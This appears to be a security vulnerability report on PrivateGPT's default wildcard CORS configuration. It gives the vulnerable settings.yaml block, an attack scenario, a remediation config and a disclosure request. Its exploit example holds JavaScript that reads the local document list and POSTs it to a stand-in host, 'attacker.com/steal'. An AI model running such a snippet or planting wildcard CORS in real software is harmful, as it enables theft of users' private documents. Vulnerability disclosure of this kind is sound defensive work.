[SECURITY] Wildcard CORS Configuration Enables Cross-Origin Attacks

[allsmog]

Security Vulnerability Report

Severity: HIGH (CVSS 8.1)
CWE: CWE-942 (Permissive Cross-domain Policy with Untrusted Domains)

Summary

Default CORS configuration allows requests from ANY origin with any method and header. This enables cross-site request forgery attacks against local PrivateGPT instances.

Vulnerability Details

File: private_gpt/launcher.py:46-55
Config: settings.yaml:8-11

Vulnerable Configuration (DEFAULT)

# settings.yaml:8-11
cors:
  enabled: true
  allow_origins: ["*"]    # ANY website can make requests
  allow_methods: ["*"]
  allow_headers: ["*"]

Attack Scenario

1. Victim runs PrivateGPT locally on localhost:8001
2. Victim visits attacker's malicious website
3. Attacker's JavaScript makes cross-origin requests to localhost:8001
4. Attacker extracts all documents or poisons knowledge base

Exploit Example

// On attacker's website
fetch('http://localhost:8001/v1/ingest/list')
  .then(r => r.json())
  .then(data => {
    // Send stolen document list to attacker
    fetch('https://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify(data)
    });
  });

Impact

• Cross-origin document theft from local instances
• CSRF attacks to poison knowledge base
• Session hijacking if auth cookies are used

Remediation

cors:
  enabled: true
  allow_origins: ["http://localhost:8001"]  # Restrict to known origins
  allow_methods: ["GET", "POST"]
  allow_headers: ["Content-Type", "Authorization"]

Researcher

Name: Shayaun Nejad
Credentials: OSCE3 (OSEP, OSWE, OSED), OSCP, CISSP
Affiliation: Product Security Engineer at Rubrik

Requesting 90-day disclosure timeline.